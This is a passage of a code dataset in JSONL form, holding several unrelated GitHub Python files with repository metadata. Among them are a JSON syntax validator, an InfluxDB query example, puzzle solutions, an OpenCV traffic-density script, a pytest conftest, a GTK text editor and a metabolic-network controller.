main()\n","repo_name":"rjgpinel/kinect2-utilities","sub_path":"kintools/reconstruct.py","file_name":"reconstruct.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12865655810","text":"import json\nimport os\n\nclass SyntaxError(Exception): ...\nclass IntegrityError(Exception): ...\n\n\nclass LexorSyntax:\n\n @staticmethod\n def _load(file_name):\n with open(file_name) as f:\n return json.load(f)\n\n @staticmethod\n def _assert_keys(dict_name, dict, keys):\n for key in keys:\n if not key in dict:\n raise SyntaxError(f'No \"{key}\" section present in {dict_name}')\n\n @staticmethod\n def _assert_sections(data):\n LexorSyntax._assert_keys('syntax file', data, [\n 'CONFIG', 'SYNTAX'\n ])\n LexorSyntax._assert_keys('CONFIG section', data['CONFIG'], [\n 'main', 'name', 'version', 'prepend_with', 'append_with'\n ])\n LexorSyntax._assert_keys('SYNTAX section', data['SYNTAX'], [\n 'PHRASES', 'WORDS', 'SYLLABLES', 'LETTERS'\n ])\n\n @staticmethod\n def _process_comments(data):\n has_comments = False\n if isinstance(data, dict):\n for name in data:\n if name == '@COMMENT':\n has_comments = True\n else:\n LexorSyntax._process_comments(data[name])\n if has_comments:\n del data['@COMMENT']\n\n @staticmethod\n def _process_imports(syntax, import_path):\n for name in syntax:\n section = syntax[name]\n if '@IMPORT' in section:\n paths = section['@IMPORT']\n for path in paths:\n path = os.path.join(import_path, path)\n data = LexorSyntax._load(path)\n section.update(data)\n del section['@IMPORT']\n\n @staticmethod\n def _assert_phrases_syntax(phrases):\n for name, phrase in phrases.items():\n if not name.startswith('P_'):\n raise SyntaxError(f'Phrase names must start with \"P_\" in phrase \"{name}\"')\n if not 'space' in phrase:\n phrase['space'] = True\n if not isinstance(phrase['space'], bool):\n raise SyntaxError(f'Attribute \"space\" must be boolean in phrase \"{name}\"')\n if not 'call' in phrase:\n phrase['call'] = False\n\n selector_phrase_count = 0\n if 'or' in phrase: selector_phrase_count += 1\n if 'and' in phrase: selector_phrase_count += 1\n if 'or+' in phrase: selector_phrase_count += 1\n if 'sequence' in phrase: selector_phrase_count += 1\n\n if selector_phrase_count == 0:\n raise SyntaxError(f'Phrase must specify one of [and, or, or+, sequence] attributes in phrase \"{name}\"')\n if selector_phrase_count > 1:\n raise SyntaxError(f'Phrase can not contain more than one of [and, or, or+] attributes in phrase \"{name}\"')\n if ('or' in phrase and not isinstance(phrase['or'], list)) or \\\n ('and' in phrase and not isinstance(phrase['and'], list)):\n raise SyntaxError(f'Attributes \"and\", \"or\" must be arrays in phrase \"{name}')\n if 'or+' in phrase and 'max' not in phrase:\n raise SyntaxError(f'Phrases with attribute \"or+\" must specify \"max\" in phrase \"{name}\"')\n\n @staticmethod\n def _assert_words_syntax(words):\n for name, word in words.items():\n if not name.startswith('W_'):\n raise SyntaxError(f'Word names must start with \"W_\" in word \"{name}\"')\n if not 'syllables' in word:\n raise SyntaxError(f'Word must specify \"syllables\": [] in word \"{name}\"')\n if not isinstance(word['syllables'], list):\n raise SyntaxError(f'Attribute \"syllables\" must be an array in word \"{name}')\n if not 'call' in word:\n word['call'] = False\n\n @staticmethod\n def _assert_syllables_syntax(syllables):\n for name, syllable in syllables.items():\n if not name.startswith('S_'):\n raise SyntaxError(f'Syllable names must start with \"S_\" in syllable \"{name}\"')\n if not 'letters' in syllable:\n raise SyntaxError(f'Word must specify \"letters\": [] in syllable \"{name}\"')\n if not isinstance(syllable['letters'], str):\n raise SyntaxError(f'Attribute \"letters\" must be array in syllable \"{name}')\n if not 'max' in syllable:\n raise SyntaxError(f'Word must specify \"max\": in syllable \"{name}\"')\n if not isinstance(syllable['max'], int):\n raise SyntaxError(f'Attribute \"max\" must be an integer in syllable \"{name}')\n if not 'inverse' in syllable:\n syllable['inverse'] = False\n if not isinstance(syllable['inverse'], bool):\n raise SyntaxError(f'Attribute \"inverse\" must be a bool in syllable \"{name}')\n\n @staticmethod\n def _assert_letters_syntax(letters):\n for name, letter in letters.items():\n if not name.startswith('L_'):\n raise SyntaxError(f'Letters names must start with \"L_\" in letters \"{name}\"')\n if not isinstance(letter, str):\n raise SyntaxError(f'Letters\" must be string in \"{name}')\n\n @staticmethod\n def _assert_integrity(syn):\n phrases = syn['PHRASES']\n words = syn['WORDS']\n syllables = syn['SYLLABLES']\n letters = syn['LETTERS']\n\n for name, phrase in phrases.items():\n keyname = (\n 'and' if 'and' in phrase else\n 'or' if 'or' in phrase else\n 'or+' if 'or+' in phrase else\n 'sequence' if 'sequence' in phrase else None\n )\n for ref in phrase[keyname]:\n if ref not in phrases and ref not in words:\n raise IntegrityError(f'{ref} is not resolvable in PHRASES or WORDS')\n\n for name, word in words.items():\n for ref in word['syllables']:\n if ref not in syllables.keys():\n raise IntegrityError(f'{ref} is not resolvable in SYLLABLES')\n\n for name, syllable in syllables.items():\n if syllable['letters'] not in letters.keys():\n raise IntegrityError(f'{ref} is not resolvable in LETTERS')\n\n @staticmethod\n def get_syntax(syntax_file_name):\n import_path = os.path.dirname(syntax_file_name)\n data = LexorSyntax._load(syntax_file_name)\n\n try:\n LexorSyntax._assert_sections(data)\n syn = data['SYNTAX']\n LexorSyntax._process_imports(syn, import_path)\n LexorSyntax._process_comments(data)\n LexorSyntax._assert_phrases_syntax(syn['PHRASES'])\n LexorSyntax._assert_words_syntax(syn['WORDS'])\n LexorSyntax._assert_syllables_syntax(syn['SYLLABLES'])\n LexorSyntax._assert_letters_syntax(syn['LETTERS'])\n LexorSyntax._assert_integrity(syn)\n except SyntaxError as e:\n print(f'Synthax error in \"{syntax_file_name}\": {str(e)}')\n exit(1)\n except IntegrityError as e:\n print(f'Integrity error in \"{syntax_file_name}\": {str(e)}')\n exit(2)\n\n return data\n\n","repo_name":"apodgorny/Lexor","sub_path":"lexor/LexorSyntax.py","file_name":"LexorSyntax.py","file_ext":"py","file_size_in_byte":7200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29084101768","text":"from influxdb_client import InfluxDBClient, Point\nfrom influxdb_client.client.query_api import QueryOptions\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\nwith InfluxDBClient(url=\"http://localhost:8086\", token=\"my-token\", org=\"my-org\", debug=True) as client:\n\n \"\"\"\n Define callback to process profiler results.\n \"\"\"\n class ProfilersCallback(object):\n def __init__(self):\n self.records = []\n\n def __call__(self, flux_record):\n self.records.append(flux_record.values)\n\n\n callback = ProfilersCallback()\n\n write_api = client.write_api(write_options=SYNCHRONOUS)\n\n \"\"\"\n Prepare data\n \"\"\"\n _point1 = Point(\"my_measurement\").tag(\"location\", \"Prague\").field(\"temperature\", 25.3)\n _point2 = Point(\"my_measurement\").tag(\"location\", \"New York\").field(\"temperature\", 24.3)\n write_api.write(bucket=\"my-bucket\", record=[_point1, _point2])\n\n \"\"\"\n Pass callback to QueryOptions\n \"\"\"\n query_api = client.query_api(\n query_options=QueryOptions(profilers=[\"query\", \"operator\"], profiler_callback=callback))\n\n \"\"\"\n Perform query\n \"\"\"\n tables = query_api.query('from(bucket:\"my-bucket\") |> range(start: -10m)')\n\n for profiler in callback.records:\n print(f'Custom processing of profiler result: {profiler}')\n","repo_name":"influxdata/influxdb-client-python","sub_path":"examples/query_with_profilers.py","file_name":"query_with_profilers.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"31266243131","text":"import sys\n\nactive = set()\nfor i, line in enumerate(open(sys.argv[1])):\n for j, ch in enumerate(line.strip()):\n if ch == '#':\n active.add((0, 0, i, j))\n\ndef simulate(active, dirs):\n for step in range(6):\n nns_count = {}\n for i, j, k, l in active:\n for di, dj, dk, dl in dirs:\n coord2 = i+di, j+dj, k+dk, l+dl\n nns_count[coord2] = nns_count.get(coord2, 0) + 1\n\n new_active = set()\n for coord in active:\n if nns_count.get(coord, 0) in [2, 3]:\n new_active.add(coord)\n for coord, ct in nns_count.items():\n if coord not in active and ct == 3:\n new_active.add(coord)\n active = new_active\n print(len(active))\n\ndirs_1 = [(0, di, dj, dk) for di in range(-1, 2) for dj in range(-1, 2) for dk in range(-1, 2)]\ndirs_1 = [dijk for dijk in dirs_1 if dijk != (0, 0, 0, 0)]\nsimulate(active, dirs_1)\n\ndirs_2 = [(di, dj, dk, dl) for di in range(-1, 2) for dj in range(-1, 2) for dk in range(-1, 2) for dl in range(-1, 2)]\ndirs_2 = [dijk for dijk in dirs_2 if dijk != (0, 0, 0, 0)]\nsimulate(active, dirs_2)\n","repo_name":"erikbern/advent-of-code-2020","sub_path":"day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"7811358408","text":"sum = 0 \r\nstudent = []\r\napple = []\r\nn = int(input())\r\nfor _ in range(n):\r\n x,y = map(int,input().split())\r\n student.append(x)\r\n apple.append(y)\r\n\r\nfor i in range(n):\r\n if student[i] > apple[i]:\r\n sum += apple[i]\r\n else:\r\n sum += apple[i] % student[i]\r\nprint(sum)","repo_name":"shotgun1107/coding-test","sub_path":"백준/Bronze/10833. 사과/사과.py","file_name":"사과.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34275403467","text":"class Exercises:\n def __init__(self, topic, course_name, judge_contest_link, problems):\n self.topic = topic\n self.course_name = course_name\n self.judge_contest_link = judge_contest_link\n self.problems = [*problems]\n\n def get_info(self):\n info = f'Exercises: {self.topic}\\n' \\\n f'Problems for exercises and homework for the \"{self.course_name}\" course @ SoftUni.' \\\n f'\\nCheck your solutions here: {self.judge_contest_link}\\n'\n\n for p in range(len(self.problems)):\n if p == len(self.problems) - 1:\n info += f'{p + 1}. {self.problems[p]}'\n else:\n info += f'{p + 1}. {self.problems[p]}\\n'\n return info\n\n\nnum = 1\nitems = []\nwhile True:\n line_input = input()\n if line_input == 'go go go':\n break\n\n topic, course_name, judge_contest_link, all_problems = list(line_input.split(' -> '))\n problems = all_problems.split(', ')\n items.append(Exercises(topic, course_name, judge_contest_link, problems))\n\nfor i in items:\n print(i.get_info())\n\n\n\n","repo_name":"Dochko0/Python","sub_path":"Python_Fundamentals/06_Object_And_Classes/task_object_and_classes/d_exercises.py","file_name":"d_exercises.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3987668760","text":"# coding: utf-8\nfrom kafka import KafkaProducer\n\nimport time\n\nproducer = KafkaProducer(bootstrap_servers='localhost:9092')\n\nwith open('/data/Log.log', 'r') as f:\n for l in f:\n word = l.split(\"`\")[1]\n time.sleep(0.1)\n producer.send('sex', word.encode('utf-8'))\n","repo_name":"Longong/python-kafka","sub_path":"scripts/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29168737151","text":"import cv2\nimport numpy as np\n\n\ndef density_calculation():\n y = 1\n idx = 0\n\n def getcontours_1(img,b): # lane detection\n print(\"getcontours_1\")\n box=b\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if 1500 < area:\n cv2.drawContours(imgContour_1,cnt,-1,(255,50,0),2)\n peri = cv2.arcLength(cnt,True)\n aprox = cv2.approxPolyDP(cnt,0.02*peri,False)\n objCor = len(aprox)\n x, y, w, h = cv2.boundingRect(aprox)\n if (3 < objCor < 8):\n box += 1\n objectType = \"OB=%d a=%s\"%(box,area)\n else : objectType = \"NONE\"\n cv2.rectangle(imgContour_1,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(imgContour_1,objectType,\n (x+(w//2)-80,y+(h//2)+50),cv2.FONT_HERSHEY_COMPLEX,0.7,(0,0,0),1)\n print(\"number of objects in line 1\", box)\n return imgContour_1, box\n\n def getcontours_2(img,b): # object detection\n print(\"getcontours_2\")\n box=b\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if (1500 < area):\n cv2.drawContours(imgContour_2,cnt,-1,(255,50,0),2)\n peri = cv2.arcLength(cnt,True)\n aprox = cv2.approxPolyDP(cnt,0.02*peri,False)\n objCor = len(aprox)\n x, y, w, h = cv2.boundingRect(aprox)\n if (3 < objCor < 10):\n box += 1\n objectType = \"OB=%d a=%s\"%(box,area)\n else : objectType = \"NONE\"\n cv2.rectangle(imgContour_2,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(imgContour_2,objectType,\n (x+(w//2)-80,y+(h//2)+50),cv2.FONT_HERSHEY_COMPLEX,0.7,(0,0,0),1)\n print(\"number of objects in line 2\", box)\n return (imgContour_2,box)\n\n def getcontours(img,b,s,zz):\n print(\"getcontours\")\n box=b\n idx = s\n img_1 = zz\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if (15000 < area): # < 20000):\n cv2.drawContours(imgContour,cnt,-1,(255,50,0),2)\n peri = cv2.arcLength(cnt,True)\n aprox = cv2.approxPolyDP(cnt,0.02*peri,False)\n objCor = len(aprox)\n x, y, w, h = cv2.boundingRect(aprox)\n\n rect = cv2.minAreaRect(aprox)\n bbox = cv2.boxPoints(rect)\n bbox = np.int0(bbox)\n cv2.drawContours(img, [bbox], 0, (0, 0, 255), 8)\n\n #print(\"x=%d y=%d w=%d h=%d\" %(x,y,w,h))\n if (3 < objCor < 15):\n box += 1;\n objectType = \"lane=%d a=%s\"%(box,area)\n #objectType = \"w=%d h=%d a=%s\" %(w,h,area)\n else : objectType = \"NONE\"\n\n cv2.rectangle(imgContour,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(imgContour,objectType,\n (x+(w//2)-80,y+(h//2)+50),cv2.FONT_HERSHEY_COMPLEX,0.7,(0,0,0),1)\n\n idx += 1\n new_img = img_1[y:y + h, x:x + w]\n #cv2.imshow(\"croped\" + str(idx), new_img)\n cv2.imwrite(str(idx) + '.png', new_img)\n\n cv2.waitKey(15)\n\n\n def capture_live_cam():\n print(\"fetch_live_cam\")\n #cap = cv2.VideoCapture(0)\n for u in range(2):\n cap = cv2.VideoCapture(0)\n ret, imgt = cap.read()\n cv2.imwrite(\"Shapes.png\", imgt)\n\n def fetch_image():\n img = cv2.imread(\"Shapes.png\", -1)\n imgContour = img.copy()\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n imgBlur = cv2.GaussianBlur(imgGray, (7, 7), 1)\n imgCanny = cv2.Canny\\\n (imgBlur, 50, 100)\n cv2.imshow(\"original\", img)\n cv2.imshow(\"canny\", imgCanny)\n return (imgCanny, imgContour, img)\n\n\n #cap = capture_live_cam()\n imgCanny,imgContour,img = fetch_image()\n while y:\n print(\"While1\")\n box = 0\n tri = 0\n getcontours(imgCanny, box, idx, img)\n cv2.waitKey(15)\n boxb = 0\n image = cv2.imread(\"1.png\", -1)\n imgContour_1 = image.copy()\n imgGray_1 = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n imgBlur_1 = cv2.GaussianBlur(imgGray_1, (7, 7), 1)\n imgCanny_1 = cv2.Canny(imgBlur_1, 50, 100)\n imgContour_r,boxb = getcontours_1(imgCanny_1,box)\n #cv2.imshow(\"canny_1\", imgCanny_1)\n \"\"\"#cv2.imshow(\"Lane_1\", imgContour_r)#\"\"\"\n boxa = 0\n image_a = cv2.imread(\"2.png\", -1)\n imgContour_2 = image_a.copy()\n imgGray_2 = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n imgBlur_2 = cv2.GaussianBlur(imgGray_2, (7, 7), 1)\n imgCanny_2 = cv2.Canny(imgBlur_2, 50, 100)\n imgContour_ra,boxa = getcontours_2(imgCanny_2, box)\n #cv2.imshow(\"canny_2\", imgCanny_2)\n\n \"\"\"#cv2.imshow(\"Lane_2\", imgContour_ra)\n cv2.imshow(\"Con\", imgContour)\"\"\"#\n y = 0\n\n #if(cv2.waitKey()):\n #y = 0\n #cv2.destroAllWindows()\n return(img, boxa, boxb)\n\n\n#i, a, b = density_calculation()\n#print(\"a:\", a)\n#print(\"b:\", b)\n","repo_name":"uniqueullas/Density-Based-Traffic-Controll","sub_path":"base_file.py","file_name":"base_file.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16388937291","text":"# -*-coding:utf-8-*-\nfrom typing import List\n\nimport pytest\nimport yaml\nimport sys\n\nfrom pytest_demo3.calc import Calculator\n\nsys.path.append('../../..')\nprint(sys.path)\n\nimport os\n\n\n# 作用域:session>module>class>function\n# function:方法或函数级别调用一次\n# @pytest.fixture(scope='function')\n# class:类级别调用一次\n# @pytest.fixture(scope='class')\n# module:模块级别调用一次\n# @pytest.fixture(scope='module')\n# session:多个文件只调用一次\n@pytest.fixture(scope='session')\ndef connectDB():\n print(\"连接数据库操作\")\n yield\n print(\"断开数据库连接\")\n\n\n@pytest.fixture(scope='class')\ndef get_calc():\n print(\"获取计算器实例\")\n calc = Calculator()\n return calc\n\n\n# 通过os.path.dirname(__file__)能够获取当前文件所在的目录\nyamlfilepath = os.path.dirname(__file__) + \"/data/calc.yaml\"\n# ./data/calc.yaml ====>.代表当前路径,也就是说你在哪个路径下执行测试文件,就叫做当前路径\n# 读取文件\nwith open(yamlfilepath, encoding='utf-8') as f:\n # safe_load()只能一次\n data = yaml.safe_load(f)\n # 获取add下的datas里的数据\n adddatas = data['add']['datas']\n print(adddatas)\n # 获取add下的myid里的数据\n myid = data['add']['myid']\n print(myid)\n # 获取div下的datas里的数据\n adddatas1 = data['div']['datas']\n print(adddatas1)\n # 获取div下的myid里的数据\n myid1 = data['div']['myid']\n print(myid1)\n\n\n@pytest.fixture(params=adddatas, ids=myid)\ndef get_datas(request):\n data = request.param\n print(f\"request.param的测试数据是:{data}\")\n return data\n\n\n# 如果不去定义这些hook函数,它会按照pytest默认的规则去运行测试用例\n# 如果在conftest.py文件里面定义的这些hook函数,名字和参数要与官网定义的一模一样\n# 在hook函数内部实现要改写的规则\ndef pytest_collection_modifyitems(\n session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n \"\"\"Called after collection has been performed. May filter or re-order\n the items in-place.\n\n :param _pytest.main.Session session: The pytest session object.\n :param _pytest.config.Config config: The pytest config object.\n :param List[_pytest.nodes.Item] items: List of item objects.\n \"\"\"\n print(\"items\")\n print(items)\n # 测试用例反转\n items.reverse()\n # 测试用例参数的编码格式改写\n for item in items:\n item.name = item.name.encode('utf-8').decode('unicode-escape')\n item._nodeid = item.nodeid.encode('utf-8').decode('unicode-escape')\n # 如果测试用例里面有字符,则自动的添加一些标签\n if 'add' in item.nodeid:\n item.add_marker(pytest.mark.add)\n elif 'div' in item.nodeid:\n item.add_marker(pytest.mark.div)\n if 'sub' in item.nodeid:\n item.add_marker(pytest.mark.sub)\n\n\n# parser:用户命令行参数与ini文件值得解析器\ndef pytest_addoption(parser):\n mygroup = parser.getgroup(\"hogwarts\") # group将下面所有的option都展示在这个group下\n mygroup.addoption(\"--env\", # 注册一个命令行选项\n default='test', # 默认值\n dest='env', # 存储的变量\n help='set your run env' # 参数说明\n )\n mygroup.addoption(\"--des\", # 注册一个命令行选项\n default='cjj', # 默认值\n dest='cjj', # 存储的变量\n help='set your param' # 参数说明\n )\n\n\n# 获取参数\n@pytest.fixture(scope='session')\ndef cmdoption(request):\n return request.config.getoption(\"--env\", default='test')\n","repo_name":"twinklecjj/cjj_python","sub_path":"python_pytest/pytest_demo3/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6801790736","text":"#!/usr/bin/env python3\nimport webbrowser\n\nfrom dialogs.search import Search\nfrom windows import Gtk, Gdk, g\nfrom dialogs.about import About\nfrom dialogs.open_file import OpenFile\nfrom widgets.text_view import TextView\n\n\nclass App:\n def destroy(self, widget):\n Gtk.main_quit()\n\n def about(self, widget):\n About(self.is_dev)\n\n def search(self, widget):\n self.textview.on_clear_clicked()\n self.textview.on_search_clicked()\n\n def replace(self, widget):\n self.textview.on_clear_clicked()\n self.textview.on_replace_clicked()\n\n def save(self, widget, has_name):\n is_saved, filename = self.open_file_inst.save_as() if has_name else self.open_file_inst.save()\n if is_saved:\n self.bar.push(0, filename)\n else:\n self.err_dialog = Gtk.MessageDialog(self, Gtk.DialogFlags.MODAL, Gtk.MessageType.INFO,\n Gtk.ButtonsType.OK, g(\"Alert\"))\n self.err_dialog.format_secondary_text(g(\"File %s not saved.\") % filename)\n self.err_dialog.show()\n\n def open_file(self, widget):\n is_opened, filename = self.open_file_inst.run()\n if is_opened:\n self.bar.push(0, filename)\n\n def _key_press_event(self, widget, event):\n keyval = event.keyval\n keyval_name = Gdk.keyval_name(keyval)\n state = event.state\n ctrl = (state & Gdk.ModifierType.CONTROL_MASK)\n if ctrl and keyval_name == 's':\n self.save(widget)\n elif ctrl and keyval_name == 'o':\n self.open_file(widget)\n elif ctrl and keyval_name == 'q':\n self.destroy(widget)\n elif ctrl and keyval_name == 'r':\n self.replace(widget)\n elif ctrl and keyval_name == 'f':\n self.search(widget)\n elif keyval_name == \"Escape\":\n self.destroy(widget)\n else:\n return False\n return True\n\n def translation(self, widget):\n webbrowser.open(\"https://github.com/karim88/SupMTI-TextEditor\")\n\n def report(self, widget):\n webbrowser.open(\"https://github.com/karim88/SupMTI-TextEditor/issues\")\n\n def __init__(self, files, is_dev):\n self.is_dev = is_dev\n self.files = files\n self.win = Gtk.Window()\n self.win.set_default_size(800, 600)\n\n self.win.connect('key-press-event', self._key_press_event)\n\n # HeadBar\n self.head = Gtk.HeaderBar()\n self.head.props.show_close_button = True\n self.head.props.title = g(\"SupMTI-TextEditor\")\n self.win.set_titlebar(self.head)\n\n # Containers\n self.box = Gtk.VBox()\n self.menu = Gtk.MenuBar()\n self.menu.set_hexpand(True)\n\n # Text Editor\n self.textview = TextView(self.files)\n self.open_file_inst = OpenFile(self.files, self.textview)\n\n # StatusBar\n self.bar = Gtk.Statusbar()\n self.bar.push(0, g(\"New file\"))\n\n self.stmenu = Gtk.MenuItem(g(\"Menu\"))\n self.menu.append(self.stmenu)\n self.m = Gtk.Menu()\n self.stmenu.set_submenu(self.m)\n \"\"\" Open file \"\"\"\n self.open = Gtk.MenuItem(g(\"Open file\"))\n self.open.connect('activate', self.open_file)\n self.m.append(self.open)\n \"\"\" Save \"\"\"\n self.save_widget = Gtk.MenuItem(g(\"Save\"))\n self.save_widget.connect('activate', self.save, False)\n self.m.append(self.save_widget)\n \"\"\" Save as \"\"\"\n self.save_widget = Gtk.MenuItem(g(\"Save as\"))\n self.save_widget.connect('activate', self.save, True)\n self.m.append(self.save_widget)\n \"\"\" Search \"\"\"\n self.search_menu = Gtk.MenuItem(g('Find'))\n self.m.append(self.search_menu)\n self.search_menu.connect('activate', self.search)\n \"\"\" Search & Eeplace \"\"\"\n self.replace_menu = Gtk.MenuItem(g('Find & Replace'))\n self.m.append(self.replace_menu)\n self.replace_menu.connect('activate', self.replace)\n \"\"\" Exit \"\"\"\n self.xit = Gtk.MenuItem(g(\"Exit\"))\n self.xit.connect('activate', self.destroy)\n self.m.append(self.xit)\n\n self.hmenu = Gtk.MenuItem(g(\"Help\"))\n self.menu.append(self.hmenu)\n self.m2 = Gtk.Menu()\n self.hmenu.set_submenu(self.m2)\n \"\"\" Translate \"\"\"\n self.tra = Gtk.MenuItem(g(\"Translate this Application\"))\n self.tra.connect('activate', self.translation)\n self.m2.append(self.tra)\n \"\"\" Report a bug \"\"\"\n self.bug = Gtk.MenuItem(g(\"Report a bug\"))\n self.bug.connect('activate', self.report)\n self.m2.append(self.bug)\n \"\"\" About \"\"\"\n self.abt = Gtk.MenuItem(g(\"About\"))\n self.abt.connect('activate', self.about)\n self.m2.append(self.abt)\n\n self.head.pack_start(self.menu)\n self.box.pack_end(self.bar, False, False, 0)\n self.box.pack_end(self.textview.scrolled_window, True, True, 0)\n\n self.win.add(self.box)\n self.win.show_all()\n self.win.connect(\"destroy\", self.destroy)\n\n def main(self):\n Gtk.main()\n","repo_name":"karim88/SupMTI-TextEditor","sub_path":"windows/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2479084393","text":"from metabolicnetwork import MetabolicNetwork\r\nfrom shared import InputOptions\r\n\r\nimport graph\r\n\r\n\r\nclass RunMetabolicalNetworkController:\r\n '''\r\n This class implements the controllers of each functionality.\r\n Allows the interaction between the user and the metabolic network.\r\n '''\r\n\r\n def __init__(self, options):\r\n self.options = options\r\n\r\n\r\n def load_from_file(self):\r\n 'Creates a new MetabolicNetwork object from the filepath introduced.'\r\n self.metabolic_network = MetabolicNetwork.create(self.options[InputOptions.FILEPATH])\r\n if self.metabolic_network is None:\r\n raise Exception(\"File not valid!\")\r\n return self\r\n\r\n \r\n def get_topological_analysis(self):\r\n 'Gets the topological measures of the metabolic network and sends to the user. '\r\n if self.options[InputOptions.TOPOLOGICAL_ANALYSIS]:\r\n return self.metabolic_network.get_centrality_measures()\r\n else:\r\n return None, None\r\n \r\n def get_graphical_visualization(self):\r\n 'Gets the 3D graph visualization of the metabolic network and shows to the user.'\r\n if self.options[InputOptions.GRAPHIC_VISUALIZATION]:\r\n return self.metabolic_network.show_graphical_visualization()\r\n \r\n \r\n def get_number_reactions_metabolites(self):\r\n 'Gets the number of reactions and metabolites from the metabolic network and sends to the user'\r\n if self.options[InputOptions.NUMBER_REACT_MET]:\r\n return self.metabolic_network.get_number_reactions_metabolites()\r\n else:\r\n return [None, None]\r\n \r\n \r\n def get_final_metabolites(self):\r\n 'Gets the final metabolites of the metabolic network and sends to the user.'\r\n if self.options[InputOptions.FINAL_METABOLITES]:\r\n return self.metabolic_network.get_final_metabolites()\r\n \r\n \r\n def get_active_reactions(self):\r\n 'Gets the active reactions through the list of metabolites introduced by the user and sends to him.'\r\n if self.options[InputOptions.ALL_REACTIONS] != []:\r\n list_metabolites = self.options[InputOptions.ALL_REACTIONS]\r\n return self.metabolic_network.get_active_reactions(list_metabolites)\r\n\r\n \r\n def get_top5_metabolites(self):\r\n 'Gets the five most frequent metabolites of the metabolic network and sends to the user.'\r\n if self.options[InputOptions.TOP5_METABOLITES]:\r\n return self.metabolic_network.get_frequent_metabolites()\r\n\r\n \r\n def get_metabolites_excreted(self):\r\n 'Gets the metabolites excreted through the list of metabolites introduced by the user and sends to him.'\r\n if self.options[InputOptions.ALL_PRODUCTS] != []:\r\n list_metabolites = self.options[InputOptions.ALL_PRODUCTS]\r\n return self.metabolic_network.get_metabolites_excreted(list_metabolites) \r\n\r\n\r\n def generate_metabolic_networks(self):\r\n 'Gets the file with *.txt format with the metabolic network of the pathway introduced by the user and sends to him.'\r\n if self.options[InputOptions.AUTO_GENERATION]:\r\n pathway = self.options[InputOptions.AUTO_GENERATION_PATHWAY]\r\n return self.metabolic_network.generate_metabolic_networks(pathway)\r\n","repo_name":"paty-oliveira/MetabolicNetwork","sub_path":"metnet/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71784304872","text":"'''\nleetcode 98\n다시보기. 박수진 찍어준 문제\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n self.sol = True\n\n def getMinMax(root):\n if not self.sol:\n return -1, -1\n\n if root.left:\n left_min, left_max = getMinMax(root.left)\n\n if left_max >= root.val:\n self.sol = False\n return -1, -1\n else:\n left_min = root.val\n\n if root.right:\n right_min, right_max = getMinMax(root.right)\n\n if right_min <= root.val:\n self.sol = False\n return -1, -1\n else:\n right_max = root.val\n\n return left_min, right_max\n\n if root:\n getMinMax(root)\n return self.sol\n\n def isValidBST2(self, root):\n def checkMinMax(root, mi, ma):\n if not root:\n return True\n\n if mi != None and mi >= root.val or ma != None and ma <= root.val:\n return False\n\n return checkMinMax(root.left, mi, root.val) and checkMinMax(root.right, root.val, ma)\n\n return checkMinMax(root, None, None)\n\n def isValidBST3(self, root):\n self.prev = None\n\n def inorder(root):\n if not root: return True\n\n l = inorder(root.left)\n if not l: return False\n\n if self.prev is not None:\n if self.prev >= root.val: return False\n self.prev = root.val\n\n r = inorder(root.right)\n return r\n\n return inorder(root)\n","repo_name":"yhancsx/algorithm-weekly","sub_path":"cracking_the_coding_interview/4.5.py","file_name":"4.5.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"69813055594","text":"import sys; input= lambda: sys.stdin.readline().rstrip()\nfor _ in range(int(input())):\n n= int(input())\n L= [*map(int, input().split())]\n if n==1:\n print(0)\n continue\n\n def find_max(_from):\n ans=n-1\n mx=L[n-1]\n for i in range(n-2,_from-1,-1):\n if L[i]>mx:\n mx=L[i]\n ans=i\n return ans\n\n sellingday=find_max(0)\n profit=0\n amount=0\n for i in range(n):\n if i==sellingday:\n 